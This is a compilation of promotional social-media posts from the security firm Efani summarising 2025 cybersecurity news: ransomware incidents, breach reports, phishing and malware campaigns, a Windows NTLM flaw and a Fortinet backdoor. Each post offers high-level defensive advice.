🚨 Gig platforms like Grubhub, Uber, and DoorDash are becoming prime targets for cybercriminals — and gig workers are paying the price.

In February, Grubhub confirmed a data breach exposing customer names, contact info, hashed passwords, and even partial payment data. The breach stemmed from a vulnerability in a third-party vendor.

But this incident highlights a much bigger threat: gig worker platforms are increasingly vulnerable to account takeovers and fraud.

Why are threat actors targeting the gig economy?
- High turnover = less consistent security hygiene
- Users access platforms from multiple personal devices
- Instant payouts make stolen accounts more lucrative
- Contractors rarely receive cybersecurity training

Research from TransUnion shows:
- 34% of gig platform users experienced fraud in 2024 (up from 23% in 2023)
- 75% would switch platforms or stop using an app if they were victimized
- Users want identity protection, fraud monitoring, and stronger safeguards

Experts say stronger defenses are needed, including:
- Mandatory MFA (even SMS-based as a starting point)
- Password manager adoption and secure reset flows
- Monitoring for demographic or device changes on accounts
- Detecting unusual activity with behavioral biometrics (keystrokes, hotkeys, VPN use)

Gig workers' ability to cash out earnings quickly — multiple times a day — makes their accounts especially attractive for attackers. And with payouts hitting $20B in a single quarter at Uber, the stakes are only getting higher.

Cybersecurity teams must go beyond reactive fraud handling. By monitoring login patterns, using behavioral analytics, and enforcing minimum controls, they can disrupt account hijacking attempts before money disappears.

#CyberSecurity #DataBreach #EfaniSecure

Cybercrime cost Americans a record-breaking $16.6 billion in 2024 — a 33% increase over the previous year, according to the FBI’s Internet Crime Complaint Center (IC3).

The newly released 2025 IC3 report shows:
- 859,532 complaints were filed last year
- 256,256 involved financial losses
- Average loss per victim: $19,372
- Older adults (60+) were hit hardest, with $4.8 billion in losses across 147,127 complaints

The FBI called ransomware the most persistent threat to critical infrastructure, with ransomware-related complaints rising 9% in 2024. However, the report stresses that the true impact is far higher than reported numbers — as most incidents go unreported or underreported.

The FBI clarifies that their loss estimates:
- Do not include lost productivity, downtime, or third-party recovery costs
- Only reflect what’s voluntarily submitted to IC3 or FBI field agents
- Underrepresent industries that choose not to report to law enforcement

Since 2020, IC3 has received 4.2 million complaints totaling over $50 billion in losses. Over 9 million complaints have been submitted since the program’s inception.

In a public warning, the FBI also noted an increase in scammers impersonating IC3 officials, targeting previous fraud victims by offering fake recovery services.

At @Efani, we believe the real number isn’t $16.6 billion — it’s much, much higher. Cybercrime is now an economic threat, not just a tech problem. Ransomware, impersonation, and digital fraud are evolving — and our defenses need to evolve faster.

#CyberSecurity #FBI #EfaniSecure

🚨 A February ransomware attack on Baltimore City Public Schools has now been confirmed to have compromised sensitive data belonging to over 25,000 individuals — including teachers, staff, contractors, and students.

On Tuesday, the district issued a public breach notification revealing that:
- The ransomware attack occurred on February 13, 2025
- Sensitive documents were stolen, including I-9 records and background checks
- Impacted data includes Social Security numbers, driver’s licenses, passport info, and even student call logs and attendance records
- 55% of all school employees were reportedly affected
- Over 1,150 students — roughly 1.5% of the district's enrollment — had personal information accessed

While no ransom was paid, reports suggest the Cloak ransomware gang may be behind the attack. So far, no group has taken credit publicly.

Additional context:
- Law enforcement was notified
- Cybersecurity firms were brought in for investigation and recovery
- The school district is now offering two years of credit monitoring to impacted individuals
- Affected parties are receiving breach notification letters this week

In a positive step, the district has rolled out new cybersecurity enhancements:
- Endpoint Detection and Response (EDR) software
- District-wide password resets
- Continued forensic investigation

Baltimore has been no stranger to cyberattacks:
- A 2020 school system breach cost more than $10 million
- A 2019 ransomware attack disrupted city-wide operations

And Baltimore’s not alone — experts have already recorded 75 ransomware attacks on U.S. K-12 schools and colleges in 2025, one of the highest numbers ever tracked.

At @Efani, we believe that the education sector — often underfunded and digitally vulnerable — is now squarely in the crosshairs. Schools don’t just need backups. They need active defense, endpoint visibility, and employee training that starts at onboarding.

#CyberSecurity #Ransomware #EducationSecurity #DataBreach #K12CyberRisk #EfaniSecure #BaltimoreCyberattack

📈 Ransomware and vulnerability exploitation are surging — and attackers are moving faster, hitting harder, and targeting smaller victims more aggressively than ever.

Verizon’s 2025 Data Breach Investigations Report reveals sharp increases across multiple threat vectors:
- Ransomware was present in 44% of breaches (up 37% YoY)
- Exploited vulnerabilities surged 34%, nearly matching credential abuse
- Third-party involvement in breaches doubled, from 15% to 30%

Ransomware now disproportionately impacts small and mid-sized businesses:
- 88% of SMB breaches involved ransomware
- Compared to just 39% in larger organizations
- While ransom payments declined, attack frequency and speed continue to rise
- Median ransom payment dropped from $150K → $115K

Vulnerability exploitation is tightly linked:
- 20% of initial breach vectors came from unpatched vulnerabilities
- Edge devices and VPNs were hit hardest (Ivanti, Cisco, Fortinet, Palo Alto)
- Edge device exploitation grew 8x YoY
- Only 54% of known edge vulnerabilities were fully remediated — median patch time: 32 days

Espionage-motivated breaches also leaned heavily on vulnerabilities:
- In 70% of these cases, initial access came from unpatched flaws
- Ransomware operators and state-backed actors continue to exploit the same gaps

The bottom line: attackers aren’t changing tactics — they’re maximizing opportunity.

At @Efani, we believe these numbers paint a clear picture. SMBs, edge networks, and third-party dependencies are now prime targets. Ransomware may not always demand a payment, but it always demands attention.

#CyberSecurity #Ransomware #VulnerabilityManagement #DataBreach #SMBSecurity #DBIR2025 #ThirdPartyRisk #EfaniSecure

🚨 Marks & Spencer confirms a cyberattack that disrupted operations, including delays in its popular Click and Collect service.

The British retail giant — with over 1,400 stores and 64,000 employees worldwide — issued a statement through the London Stock Exchange confirming they’re managing an ongoing cybersecurity incident.

Key details:
- Some store operations were temporarily adjusted to protect customer data
- Website and mobile app remain operational
- Delays are affecting Click and Collect orders; customers are asked to wait for confirmation emails before heading to stores
- The company has engaged external cybersecurity experts
- Authorities, including the UK’s data protection office and the National Cyber Security Centre, have been notified

At this stage, no ransomware groups have claimed responsibility, but security experts warn that such silence is common early in extortion-based attacks. If ransomware is involved, there is a high likelihood of data theft — which may later be used to pressure M&S into paying a ransom.

This incident is a reminder that even mature global retailers face significant risks when it comes to supply chain and customer-facing services.

At @Efani, we believe protecting customer trust in retail starts with resilient digital operations. Every outage — especially in fulfillment — risks brand damage that no loyalty program can fix.

#CyberSecurity #RetailSecurity #MarksAndSpencer #Ransomware #IncidentResponse #EfaniSecure #ClickAndCollect #DataProtection

🚢 While headlines focus on border security, America’s maritime cybersecurity remains dangerously exposed — and adversaries know it.

With 95,000+ miles of coastline and over 360 ports supporting $5.4 trillion in economic activity and 10 million jobs, the U.S. maritime transportation system is both mission-critical and vulnerable.

The August 2024 ransomware attack at the Port of Seattle proved it: mass cargo delays, a breach of 90,000 personal records, and potential risks to life.

As state-sponsored actors like China and Russia ramp up digital attacks on U.S. critical infrastructure, experts are urging a complete overhaul of America’s maritime cyber posture. A few key problems:
- The U.S. Coast Guard lacks cyber expertise and visibility
- Over 200 Chinese-manufactured cranes with foreign software still operate in U.S. ports
- The maritime industry relies heavily on outdated operational tech and software
- SLTT governments lack funding, clear threat metrics, and secure channels for coordination

The solution? A coordinated strategy that includes:
- Modernizing Coast Guard cyber personnel, training, and tools
- Investing in AI, blockchain, and port software upgrades
- Passing the bipartisan Port Crane Security and Inspection Act
- Strengthening public-private partnerships with port operators
- Preserving FEMA’s port cybersecurity grant programs
- Fast-tracking security clearances for local leaders
- Creating a Maritime Security Trust Fund to reinvest port fees
- Launching scholarships to bring new cyber talent into the maritime domain

With legislation like the Cyber PIVOTT Act and Executive Orders on maritime dominance and SLTT resilience, the U.S. has a chance to rebuild its shipping superiority — and secure the supply chain from the sea up.

At @Efani, we believe critical infrastructure security starts with recognition: cybersecurity isn’t just about the cloud or data centers. It’s about every port, crane, and vessel that keeps the nation moving.

#CyberSecurity #MaritimeSecurity #PortSecurity #CoastGuard #CriticalInfrastructure #NationalSecurity #EfaniSecure

🚨 Two of CISA’s most senior cybersecurity leaders have just resigned — amid growing concerns about staffing cuts and political disruption at the nation’s top cyber defense agency.

Bob Lord and Lauren Zabierek announced their departures Monday morning. Both were instrumental in shaping CISA’s Secure by Design initiative — the agency’s effort to hold tech companies accountable for insecure software and push for systemic product security reform.

- Bob Lord previously led security at the DNC, Yahoo, and Twitter, and was the first CSO at the DNC post-2016 Russia-linked breaches.
- Lauren Zabierek formerly led the Cyber Project at Harvard’s Belfer Center and has a deep background in both intelligence and cybersecurity policy.

While neither disclosed what’s next, their departures come during a period of intense change at CISA:
- Up to 1,300 employees — nearly half the agency — could be cut under the current administration
- DHS recently offered buyouts to staff, and earlier layoffs were challenged in court
- CISA’s leadership and mission are in flux, with its future role in national cyber defense uncertain

Both leaders emphasized the importance of Secure by Design as a foundation for future cyber resilience:
- “There’s a role for everyone in making software safer,” wrote Lord
- Zabierek added: “What started as a government-led call to action has become a global movement”

CISA’s Executive Director Bridget Bean thanked them, saying:
“While our approaches to Secure by Design evolve, our commitment to the principles remains steadfast.”

At @Efani, we believe in cybersecurity that begins at the design phase — not after a breach. We thank Lord and Zabierek for advancing that mission inside government and hope the private sector continues to carry the baton forward.

#CyberSecurity #SecureByDesign #CISA #PublicPrivatePartnership #CyberLeadership #EfaniSecure

😵💫 Ransomware with a meme twist: the latest Fog attacks come with DOGE-themed ransom notes — mocking victims and even offering free decryption if they "spread the malware".

Researchers at Trend Micro have been tracking a surge in attacks from the Fog ransomware group, which has now hit over 100 confirmed victims since January. While earlier variants relied on compromised VPN credentials, the latest campaigns use phishing emails to deliver a malicious “Pay Adjustment[dot]zip ” file that drops the ransomware via PowerShell.

Key observations:
- Initial infection begins with a ZIP file and LNK shortcut
- PowerShell downloads scripts and executables for system profiling, lateral movement, and encryption
- A QR code leads to Monero payment options
- Political commentary and YouTube links are embedded directly in the code
- Sectors hit include tech, education, manufacturing, and transportation

💰 The ransom notes reference the satirical Department of Government Efficiency (DOGE), making absurd demands like “list five tasks you accomplished last week” or “pay one trillion dollars.” In one version, victims are told they can decrypt their system for free — if they forward the malware.

This marks a shift in behavior:
- Originally, Fog didn’t exfiltrate data or run leak sites
- Now, researchers report double-extortion tactics and faster attack cycles
- In some incidents, data was encrypted within two hours of initial access

🛡️ Trend Micro and Darktrace urge organizations to:
- Monitor Fog IoCs
- Segment networks
- Keep offline, tested backups
- Train teams to spot phishing attempts
- Patch VPNs and remote access infrastructure

At @Efani, we believe even “troll” ransomware is no joke. Whether done for profit or chaos, the operational damage from Fog attacks can be severe. Stay vigilant — even the ransom notes are engineered for distraction.

#CyberSecurity #Ransomware #FogRansomware #DOGE #ThreatIntel #EfaniSecure #Phishing #IncidentResponse

🎙️ Got invited to speak on a crypto podcast? It might be a scam.

A threat group known as "Elusive Comet" is targeting Web3 professionals, founders, and investors — using fake media invites and Zoom calls to infect devices and steal crypto assets.

Researchers at the Open Security Alliance have confirmed that Elusive Comet has already stolen millions, using a mix of social engineering and malware deployment.

Here’s how they operate:
- Create fake brands like Aureon Capital, Aureon Press, and The OnChain Podcast
- Build a convincing online presence with active websites and social profiles
- DM or email victims with interview or podcast invites
- Schedule urgent Zoom calls and ask the target to share their screen
- Then request remote access — and install infostealers or RATs on the victim’s machine

Even the CEO of Trail of Bits was recently targeted under the guise of a "Bloomberg Crypto" interview.

🛡️ Security tips:
- Be cautious with unsolicited interview or partnership invites
- Don’t grant remote control access in Zoom unless you’re 100% sure
- Use cold wallets for crypto and monitor outbound device behavior

At @Efani, we believe the biggest threat to your digital life isn’t always technical — it’s psychological. And Elusive Comet is a reminder of just how polished modern scams have become.

#CyberSecurity #SocialEngineering #CryptoSecurity #ZoomThreats #Infostealer #RemoteAccessTrojan #EfaniSecure

🚨 Microsoft just moved MSA token signing to Azure Confidential VMs, a major step forward in securing its identity infrastructure after the high-profile Storm-0558 breach.

This move, along with the ongoing migration of Entra ID signing services, is part of Microsoft’s broader Secure Future Initiative (SFI) — described as the largest cybersecurity engineering project in its history.

Here’s what’s changing:
- MSA signing keys now protected inside Azure Confidential VMs
- Entra ID token signing is also being migrated to confidential infrastructure
- Access tokens are generated, stored, and auto-rotated via Azure-managed HSM
- 90% of identity tokens for Microsoft apps now validated via hardened SDKs
- 92% of Microsoft productivity accounts use phishing-resistant MFA
- 81% of production code branches are protected with proof-of-presence MFA
- Security logs have a mandatory 2-year retention period
- A new tenant provisioning system auto-registers tenants into the emergency response process

Microsoft is also piloting isolated customer support environments to reduce lateral movement, a direct response to risks exposed in the 2023 Storm-0558 breach, which involved forged Entra ID tokens using a compromised MSA key.

The attack, attributed to a China-linked threat group, led to unauthorized email access across U.S. and European entities.

This update builds on the lessons from the U.S. Cyber Safety Review Board (CSRB) report and pushes forward a model where signing keys, support processes, and token validation are more tightly controlled than ever before.

At @Efani, we support these kinds of structural shifts — because real security isn’t just about patching flaws after the fact, it’s about re-engineering trust from the foundation up.

#CyberSecurity #Microsoft #EntraID #CloudSecurity #SecureFutureInitiative #Storm0558 #IdentitySecurity #EfaniSecure

🚨 Over the weekend, Microsoft Entra customers experienced unexpected account lockouts — and it turns out it was caused by a mistake inside Microsoft’s own token logging systems.

On Saturday morning, organizations began receiving alerts from Microsoft Entra ID Protection that certain user accounts had potentially leaked credentials, resulting in auto-lockouts.

Initial suspicion centered around a new enterprise app called “MACE Credential Revocation” — but Microsoft has since clarified the root cause.

According to Microsoft:
- On Friday, April 18, a small percentage of short-lived user refresh tokens were mistakenly logged in full, not just as metadata
- Upon realizing the issue, Microsoft invalidated those tokens to protect customers
- This action inadvertently triggered compromise alerts and lockouts in Entra for affected users

🛠️ The alerts were issued between 4AM–9AM UTC on April 20.
Microsoft says there’s no evidence that any of the tokens were accessed maliciously. If unauthorized use is detected, their security incident response process will be activated.

Admins affected by this incident can restore access by marking users as “Confirmed Safe” in Entra.

At @Efani, we see this as another example of how even cloud giants can run into operational errors — and why incident response, transparency, and zero-trust token hygiene are essential pillars of identity security.

#CyberSecurity #Microsoft #Entra #TokenSecurity #IncidentResponse #EfaniSecure

⚠️ Phishers have found a clever way to spoof Google — and their emails pass all security checks.

A new DKIM replay phishing attack abuses Google’s own OAuth infrastructure to send fake messages that look 100% legitimate, including passing DKIM authentication.

What happened:
- A phishing email was sent from “no-reply@google.com”
- It appeared in the user’s inbox alongside real Google security alerts
- The message linked to a fake support portal hosted on sites[dot]google[dot]com — a Google-owned domain
- The attacker used Google OAuth to trigger a real security alert to their inbox, then forwarded it to victims

Why this matters:
- DKIM only verifies the headers, not the envelope — allowing this spoof to work
- The phishing site was nearly indistinguishable from Google’s actual login portal
- Because the message was signed by Google and hosted on a Google domain, it bypassed most users’ suspicions
- Similar tricks have been used with PayPal and other platforms, raising broader concerns

Google has since acknowledged the issue and is working on a fix. But this attack is a reminder:

Even the most secure-looking emails can be fraudulent.
Even Google-signed emails can be weaponized.

🛡️ At @Efani, we advocate for layered defense — because no one layer is ever enough.

#Cybersecurity #Phishing #Google #OAuth #DKIM #EmailSecurity #EfaniSecure #ThreatIntel

🚨 A new Android malware campaign is using NFC relay attacks to clone credit cards — and it’s nearly invisible to antivirus tools.

Security researchers have discovered 'SuperCard X', a malware-as-a-service (MaaS) platform that allows cybercriminals to steal card data and make contactless payments using compromised Android devices.

Key highlights from the report:
- Distributed via social engineering scams through fake SMS or WhatsApp messages
- Victims are tricked into installing a malicious app disguised as a bank “verification” tool
- Once installed, it uses NFC to read card chip data and sends it to a second attacker device
- Attackers use a companion app to emulate the victim’s card and make payments or ATM withdrawals

🔍 What makes it dangerous:
- SuperCard X requests minimal permissions, making it hard to detect
- It uses ATR-based card emulation and mutual TLS (mTLS) for secure communication
- Malware is not flagged by any antivirus engines on VirusTotal
- Transactions are small, instant, and look legitimate to banks — making them harder to detect or reverse

🛡️ Google responded saying Play Protect is active and currently no such apps are listed on Google Play. But since these apps spread outside the store, Android users remain at risk — especially if they sideload apps or fall for impersonation scams.

This is a textbook example of how mobile payment infrastructure is being exploited — and why NFC security deserves more attention in mobile-first threat models.

At @Efani we’re committed to helping protect high-risk users from silent, evasive mobile threats just like this.

#Cybersecurity #AndroidMalware #NFC #MobileSecurity #EfaniSecure #SuperCardX #FintechFraud #MalwareAsAService

🚨 Palantir is facing renewed scrutiny over its $30M contract with ICE — but the company is doubling down on its mission.

Y Combinator founder Paul Graham criticized Palantir for building tech that powers what he called the “infrastructure of the police state.” The comments were sparked by filings revealing that ICE is working with Palantir to develop an “Immigration Lifecycle Operating System” — a tool designed to help identify deportation targets and monitor self-deportations in near real-time.

In response, Palantir’s global head of commercial, Ted Mabrey, issued a strong defense of the company’s work:
- He cited Palantir’s origins with DHS after the murder of Agent Jaime Zapata in an anti-cartel operation
- He emphasized the life-saving potential of Palantir’s software and the high stakes its engineers face
- He framed the criticism as a familiar attack on mission-driven government tech, referencing Google's Project Maven
- He reiterated the company’s values: belief in mission, resilience under scrutiny, and commitment to lawful use of technology

While Mabrey didn’t directly address Graham’s challenge to formally commit that Palantir won’t support unconstitutional practices, he noted the company has made that commitment internally and publicly “in many ways from Sunday.”

Palantir continues to recruit with a clear message — that Western democracies must not lose their technological edge and that responsible partnerships with government are essential.

What this debate highlights:
- The growing divide in tech around public sector work, especially involving surveillance and law enforcement
- The challenge of building secure tools that serve national interests while protecting civil liberties
- The reputational risks companies face when government contracts intersect with immigration and constitutional rights

At @Efani, we’re deeply aware of the tension between innovation and privacy — and this is a reminder that cybersecurity, data ethics, and constitutional accountability must evolve together.

#CyberSecurity #DataPrivacy #Palantir #SurveillanceTech #ICE #GovTech #EfaniSecure

🚨 A new U.S. House report on DeepSeek highlights how one Chinese AI model may be quietly reshaping global AI strategy — and risking American data privacy.

The House Select Committee on the CCP has released findings on DeepSeek’s R1 model, revealing:
- $420M in funding from High-Flyer Quant, a Chinese trading firm
- Access to 10,000+ NVIDIA A100 chips via the Firefly supercomputing infrastructure
- Ties to China's surveillance ecosystem, including China Mobile
- Allegations of illegal training data use and export control circumvention
- App behavior that mimics spyware: collecting device IDs, typing cadence, and chat history

Lawmakers warn that DeepSeek:
- Functions as an open-source intelligence asset for China
- Circumvented guardrails from U.S. AI companies to accelerate its own development
- Operates under a tightly controlled tech ecosystem with deep state-linked partnerships

An OpenAI exec told the committee that DeepSeek “circumvented guardrails to extract reasoning outputs,” accelerating their model using techniques like distillation — potentially copying U.S. tech at lower cost.

Even more concerning:
- User data is routed via infrastructure tied to China Mobile
- DeepSeek does not encrypt much of its traffic
- It censors content critical of the Chinese government

🛡️ What this means:
- Export controls alone aren’t enough — the U.S. must improve early threat tracking
- Agencies should restrict procurement and usage of Chinese AI models
- More visibility and scrutiny are needed around AI supply chains and infrastructure

At Efani, we believe real AI security starts with understanding who’s behind the tools we use — and where our data ends up. This report is a wake-up call for all of us building or relying on AI systems today.

#AI #Cybersecurity #DeepSeek #China #DataPrivacy #EfaniSecure #ExportControls #NationalSecurity

🚨 Over 6 million Chrome users may have unknowingly installed extensions with hidden tracking code — some with spyware-like behavior.

Researcher John Tuckner from Secure Annex discovered 57 extensions, some of them public, others hidden and only accessible via direct URL. These extensions pose serious security and privacy risks.

Here’s what these extensions can do:
- Access cookies, including sensitive headers like 'Authorization'
- Monitor browsing behavior and collect top-visited sites
- Modify search engines and results
- Inject remote scripts into webpages via iframes
- Execute commands remotely, including opening/closing tabs
- Activate tracking features on demand

Some extensions claim to be security or privacy tools — including names like “Fire Shield Extension Protection,” “Securify,” and “Browser Checkup” — but contain heavily obfuscated code and suspicious external callbacks to domains like "unknow (dot) com".

📛 These extensions are:
- Not searchable on the Chrome Web Store
- Actively pushed via ads and shady websites
- Operating under broad permissions without clear purpose
- Still live in some cases, despite partial takedowns

Here are some of the most-downloaded suspicious extensions:
- Cuponomia – Coupon and Cashback (700,000 users)
- Fire Shield Extension Protection (300,000 users)
- Browser WatchDog for Chrome (200,000 users)
- Securify for Chrome™ (200,000 users)
- Total Safety for Chrome™ (300,000 users)

If you use Chrome:
- Review your installed extensions
- Remove any of the above immediately
- Reset passwords for accounts you’ve accessed recently
- Avoid installing browser tools from unverified sources

🔐 At @Efani we believe privacy tools shouldn’t come with surveillance built in. Always check extension permissions — and if it asks for too much, it’s probably taking more than it gives.

#CyberSecurity #BrowserSecurity #ChromeExtensions #Spyware #EfaniSecure #Privacy

⚠️ Legends International, the entertainment services giant behind venues like SoFi Stadium and Wembley, has disclosed a data breach impacting employees and venue visitors.

The breach was discovered on November 9, 2024, when unauthorized activity was detected in its IT systems. The company launched an investigation with external cybersecurity experts and confirmed that personal data files were exfiltrated — though the exact data types remain unspecified.

Legends International:
- Operates across 350+ venues globally
- Manages stadiums like Santiago Bernabeu, Camp Nou, Anfield, AT&T Stadium, and One World Observatory
- Recently acquired ASM Global to expand global venue operations

Given the scale of its operations and the volume of personal data it handles, this breach is significant — even though the full scope is still unclear.

The company:
- Says security measures were in place prior to the attack
- Restored systems and added undisclosed improvements post-breach
- Is offering 24 months of identity theft protection through Experian
- Claims no evidence of misuse has surfaced so far

Affected individuals have until July 31, 2025, to enroll for protection services.

As of now, no ransomware group has claimed responsibility. The method of attack and identities of the threat actors are still unknown.

At @Efani we believe incidents like this underscore the need for real-time monitoring, attack surface management, and breach response strategies — especially for organizations in high-footfall industries like entertainment and sports.

#CyberSecurity #DataBreach #LegendsInternational #Infosec #EfaniSecure

⚠️ CVE-2025-24054 is now under active attack — and it only takes a single click to leak NTLM hashes from a Windows system.

CISA has added this medium-severity Windows vulnerability to its Known Exploited Vulnerabilities catalog after confirming exploitation in the wild. The flaw enables attackers to harvest NTLM credentials through specially crafted .library-ms files.

Here’s how it works:
- A user receives a malicious file — even a single click (no execution needed) can trigger NTLM hash leakage
- Attackers send these files via phishing emails, often packed in ZIP archives or delivered directly
- Opening the archive or previewing the file initiates an SMB request, leaking NTLMv2-SSP hashes
- These hashes can then be used for pass-the-hash or lateral movement attacks inside the network

Check Point reports that the vulnerability has been exploited in at least 10 campaigns so far, targeting government and private organizations in Poland, Romania, Ukraine, and Colombia.

What makes this threat more dangerous:
- NTLM is deprecated but still present in many environments
- Minimal user interaction is required — just download and extract
- It bypasses common detection tools by triggering quietly in Windows Explorer
- It's a variant of a previously exploited flaw (CVE-2024-43451)

Microsoft patched the flaw in March, but exploitation began almost immediately. Agencies under the FCEB have until May 8 to patch — but every organization should act sooner.

At @Efani we view this as another reminder that legacy protocols like NTLM are low-hanging fruit for attackers. Even medium-severity flaws can become major risks when they require near-zero user interaction.

Patch. Audit. Replace legacy auth where possible.

#CyberSecurity #NTLM #WindowsVulnerability #CVE202524054 #CredentialSecurity #EfaniSecure

⚠️ Over 16,000 Fortinet devices have been compromised with a stealthy symlink backdoor — even after being patched.

A report from The Shadowserver Foundation reveals that attackers left behind a persistent backdoor on FortiGate devices by abusing symbolic links. These links provide read-only access to sensitive configuration files, even after vulnerabilities were patched.

Here’s what happened:
- Threat actors exploited FortiOS zero-days throughout 2023 and 2024
- They planted symbolic links in language file folders on SSL-VPN enabled devices
- These links connected public folders to the root filesystem
- Even after patching, the symlinks gave attackers continued visibility into sensitive files

Fortinet says this isn’t due to a new vulnerability — it’s a "persistence mechanism" that evaded detection by living in user-accessible directories.

The impact:
- Over 16,000 devices globally are affected
- Attackers may have had access to configuration files, including credentials
- Fortinet is notifying affected customers and has released updated AV/IPS signatures to detect and remove the malicious symlinks

🔐 If you're using FortiGate:
- Check for recent alerts from Fortinet
- Update to the latest firmware
- Reset all credentials
- Audit logs for suspicious access behavior

At Efani, we view this as a critical reminder: patching isn’t the end of an incident — it’s the start of validation. Persistence mechanisms like this one don’t need new vulnerabilities to survive.

#CyberSecurity #Fortinet #Persistence #ZeroDay #EfaniSecure #NetworkSecurity

⚠️ A new Node.js malware campaign is targeting crypto users with fake Binance and TradingView installers — using clever tricks to bypass detection and steal sensitive data.

Microsoft has detailed an active malvertising campaign exploiting Node.js and PowerShell to deliver info-stealing malware disguised as legitimate trading apps. First detected in late 2024, the campaign is aimed at crypto users and leverages fake installer sites that mimic well-known brands like Binance and TradingView.

Here’s how it works:
- Users download a rogue installer bundled with a malicious DLL (CustomActions.dll)
- The DLL collects system data, sets up persistence, and uses msedge_proxy.exe to load the real Binance website, masking the attack
- PowerShell commands then exclude the malware from Defender scans, fetch additional scripts, and send stolen data via HTTPS
- The attack culminates in deploying Node.js binaries and JavaScript code to perform deeper data exfiltration

In some cases, attackers use inline JavaScript execution and disguise traffic as Cloudflare activity to avoid detection. They also modify registry keys for persistence.

⚠️ The attack highlights:
- Node.js is trusted and cross-platform — making it a perfect vehicle for abuse
- Cloudflare-like traffic and system masquerading make this hard to detect
- The campaign uses ClickFix, malvertising, and phishing tactics — all increasingly common in targeted attacks

🎯 At @Efani, we warn against assuming any installer, script, or utility is safe just because it looks familiar.
With modern threat actors blending real and fake environments seamlessly, vigilance, endpoint monitoring, and script-level threat detection are essential.

If you're in crypto, finance, or handle sensitive data: assume you're a target.

#CyberSecurity #Malware #Nodejs #EfaniSecure #CryptoSecurity